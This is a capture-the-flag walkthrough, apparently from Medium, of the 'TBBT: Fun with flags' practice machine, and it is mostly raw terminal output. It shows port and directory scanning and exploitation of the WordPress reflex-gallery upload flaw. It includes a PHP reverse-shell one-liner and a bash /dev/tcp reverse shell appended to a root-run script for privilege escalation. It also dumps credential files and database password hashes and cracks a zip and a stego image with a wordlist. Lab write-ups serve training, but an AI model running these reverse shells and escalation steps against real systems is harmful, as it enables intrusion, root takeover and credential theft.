TBBT: Fun with flags Walkthrough

TBBT: Funwithflags
_____ _ _ _ _ _ _____ _
| ___| | | | (_) | | | | ___| |
| |_ _ _ _ __ | | | |_| |_| |__ | |_ | | __ _ __ _ ___
| _| | | | '_ \ | |/\| | | __| '_ \ | _| | |/ _` |/ _` / __|
| | | |_| | | | | \ /\ / | |_| | | | | | | | (_| | (_| \__ \
\_| \__,_|_| |_| \/ \/|_|\__|_| |_| \_| |_|\__,_|\__, |___/
__/ |
|___/

Port Scanning

┌─[root@NITRO]─[~]
└──╼ #nmap -v -A -p- 192.168.1.105

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 02:06 IST
Nmap scan report for 192.168.1.105
Host is up (0.00032s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 539 Mar 04 00:11 Welcome.txt
| -rw-r--r-- 1 ftp ftp 114 Mar 04 00:13 ftp_agreement.txt
|_drwxr-xr-x 9 ftp ftp 4096 Mar 04 00:09 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cf:5c:ee:76:7c:48:52:06:8d:56:07:7f:f6:5d:80:f2 (RSA)
| 256 ab:bb:fa:f9:89:99:02:9e:e4:20:fa:37:4f:6f:ca:ca (ECDSA)
|_ 256 ea:6d:77:f3:ff:9c:d5:dd:85:e3:1e:75:3c:7b:66:47 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 4 disallowed entries
|_/howard /web_shell.php /backdoor /rootflag.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fun with flags!
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :.....
┌─[root@NITRO]─[~]
└──╼ #telnet 192.168.1.105 1337

Trying 192.168.1.105...
Connected to 192.168.1.105.
Escape character is '^]'.
FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
Connection closed by foreign host.
http://funwithflags/
┌─[✗]─[root@NITRO]─[~]
└──╼ #dirb http://192.168.1.105
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 17 02:25:59 2020
URL_BASE: http://192.168.1.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------GENERATED WORDS: 4612---- Scanning URL: http://192.168.1.105/ ----
...
==> DIRECTORY: http://192.168.1.105/phpmyadmin/
+ http://192.168.1.105/robots.txt
...
==> DIRECTORY: http://192.168.1.105/music/wordpress/wp-admin/
...

WordPress Time

┌─[root@NITRO]─[~]
└──╼ #wpscan --url http://192.168.1.105/music/wordpress -e p
______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.8
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:[+] reflex-gallery
| Location:
http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/
| Last Updated: 2019-05-10T16:05:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| -
http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/readme.txt
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Tue Mar 17 02:37:06 2020
file:///root/reflex.html
http://funwithflags/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
http://funwithflags/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
http://funwithflags/music/wordpress/wp-content/uploads/phhp.php
php -r ‘$sock=fsockopen(“192.168.1.1”,1234);exec(“/bin/bash -i <&3 >&3 2>&3”);’
┌─[root@NITRO]─[~]
└──╼ #nc -nlvp 1234
listening on [any] 1234 …
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.105] 59998
bash: cannot set terminal process group (1153): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tbbt:/var/www/html/music/wordpress/wp-content/uploads$
www-data@tbbt:/var/ftp/pub/bernadette$ cat PENNY_README_ASAP.txt
cat PENNY_README_ASAP.txt
Penny the IT department from my Pharmaceutical company opened you an account in the B2B website.
You need to go there ASAP and learn our drugs for your interview tomorrow.
I dont remember the link, but it is easy you will find it!
Username: penny69
Password: cant post it here as sheldon said. you know the password. you use it everywhere.
www-data@tbbt:/var/ftp/pub/penny$ cat wifi_password.txt
cat wifi_password.txt
SHELDON DONT CHANGHE IT AGAIN OK!?!?!
THIS IS THE ONLY PASSWORD I CAN REMEMBER
wifipassword: pennyisafreeloader
www-data@tbbt:/home/amy$ strings secretdiary
strings secretdiary
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
__isoc99_scanf
puts
__stack_chk_fail
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.0
PTRh`
UWVS
t$,U
[^_]
Enter your username:
Enter your password:
P@SSw0rd123Sh3ld0n
Login Success!
Soon I will be adding my secrets here..
FLAG-amy{60263777358690b90e8dbe8fea6943c9}
Wrong password! YOY WILL NEVER READ MY SECRETS
User doesn't exist
;*2$"(
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
...
www-data@tbbt:/home/penny$ cat .FLAG.penny.txt
cat .FLAG.penny.txt
RkxBRy1wZW5ueXtkYWNlNTJiZGIyYTBiM2Y4OTlkZmIzNDIzYTk5MmIyNX0=
www-data@tbbt:/home/leonard$ ls -la
ls -la
total 24
drwxr-xr-x 2 leonard leonard 4096 Mar 6 00:47 .
drwxr-xr-x 10 root root 4096 Mar 4 02:33 ..
-rw — — — — 1 leonard leonard 0 Mar 6 00:47 .bash_history
-rw-r — r — 1 leonard leonard 220 Sep 1 2015 .bash_logout
-rw-r — r — 1 leonard leonard 3771 Sep 1 2015 .bashrc
-rw-r — r — 1 leonard leonard 655 May 16 2017 .profile
-rwxrwxrwx 1 root root 484 Mar 6 00:23 thermostat_set_temp.sh
www-data@tbbt:/home/leonard$ echo "bash -i >& /dev/tcp/192.168.1.1/4321 0>&1" >> thermostat_set_temp.sh
┌─[✗]─[root@NITRO]─[~]
└──╼ #nc -nlvp 4321
listening on [any] 4321 …
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.105] 35304
bash: cannot set terminal process group (3409): Inappropriate ioctl for device
bash: no job control in this shell
root@tbbt:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@tbbt:~# whoami
whoami
root
root@tbbt:~#
root@tbbt:~# cat FLAG-leonard.txt
cat FLAG-leonard.txt
____
/ \
/______\
||
/~~~~~~~~\ || /~~~~~~~~~~~~~~~~\
/~ () () ~\ || /~ () () () () ~\
(_)========(_) || (_)==== ===========(_)
I|_________|I _||_ |___________________|
.////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Gongrats!
You have rooted the box! Now you can sit on Sheldons spot!
FLAG-leonard{17fc95224b65286941c54747704acd3e}
I hope you liked it!
root@tbbt:/var/www/html/private# cat db_config.php
cat db_config.php
<?php
// Create connection
$DBUSER = 'bigpharmacorp';
$DBPASS = 'weareevil';
root@tbbt:/var/www/html/music/wordpress# cat wp-config.php
...
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'footprintsonthemoon' );
/** MySQL database username */
define( 'DB_USER', 'footprintsonthemoon' );
/** MySQL database password */
define( 'DB_PASSWORD', 'footprintsonthemoon1337' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
...
root@tbbt:/var/www/html/private# mysql -u bigpharmacorp -p
mysql -u bigpharmacorp -p
Enter password: weareevil
mysql> show databases
show databases
-> ;
;
+--------------------+
| Database |
+--------------------+
| information_schema |
| bigpharmacorp |
+--------------------+
2 rows in set (0.00 sec)
mysql> use bigpharmacorp
use bigpharmacorp
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------------+
| Tables_in_bigpharmacorp |
+-------------------------+
| products |
| users |
+-------------------------+
2 rows in set (0.00 sec)
mysql> select * from users
select * from users
-> ;
;
+----+------------+----------------------------------+------------+---------------------------------------------------+
| id | username | password | fname | description |
+----+------------+----------------------------------+------------+---------------------------------------------------+
| 1 | admin | 3fc0a7acf087f549ac2b266baf94b8b1 | josh | Dont mess with me |
| 2 | bobby | 8cb1fb4a98b9c43b7ef208d624718778 | bob | I like playing football. |
| 3 | penny69 | cafa13076bb64e7f8bd480060f6b2332 | penny | Hi I am Penny I am new here!! <3 |
| 4 | mitsos1981 | 05d51709b81b7e0f1a9b6b4b8273b217 | dimitris | Opa re malaka! |
| 5 | alicelove | e146ec4ce165061919f887b70f49bf4b | alice | Eat Pray Love |
| 6 | bernadette | dc5ab2b32d9d78045215922409541ed7 | bernadette | FLAG-bernadette{f42d950ab0e966198b66a5c719832d5f} |
+----+------------+----------------------------------+------------+---------------------------------------------------+
6 rows in set (0.00 sec)
FLAG-raz{40d17a74e28a62eac2df19e206f0987c}
┌─[root@NITRO]─[~]
└──╼ #fcrackzip -D -p /usr/share/wordlists/rockyou.txt super_secret_nasa_stuff_here.zip -u
PASSWORD FOUND!!!!: pw == astronaut
┌─[✗]─[root@NITRO]─[~]
└──╼ #unzip super_secret_nasa_stuff_here.zip
Archive: super_secret_nasa_stuff_here.zip
[super_secret_nasa_stuff_here.zip] marsroversketch.jpg password:
inflating: marsroversketch.jpg
┌─[✗]─[root@NITRO]─[~]
└──╼ #stegcracker marsroversketch.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.7 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2020 - Luke Paris (Paradoxis)Counting lines in wordlist..
Attacking file 'marsroversketch.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: iloveyoumom
Tried 51221 passwords
Your file has been written to: marsroversketch.jpg.out
iloveyoumom
┌─[✗]─[root@NITRO]─[~]
└──╼ # file marsroversketch.jpg.out
marsroversketch.jpg.out: ASCII text
┌─[✗]─[root@NITRO]─[~]
└──╼ # cat marsroversketch.jpg.out
FLAG-howard{b3d1baf22e07874bf744ad7947519bf4}

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store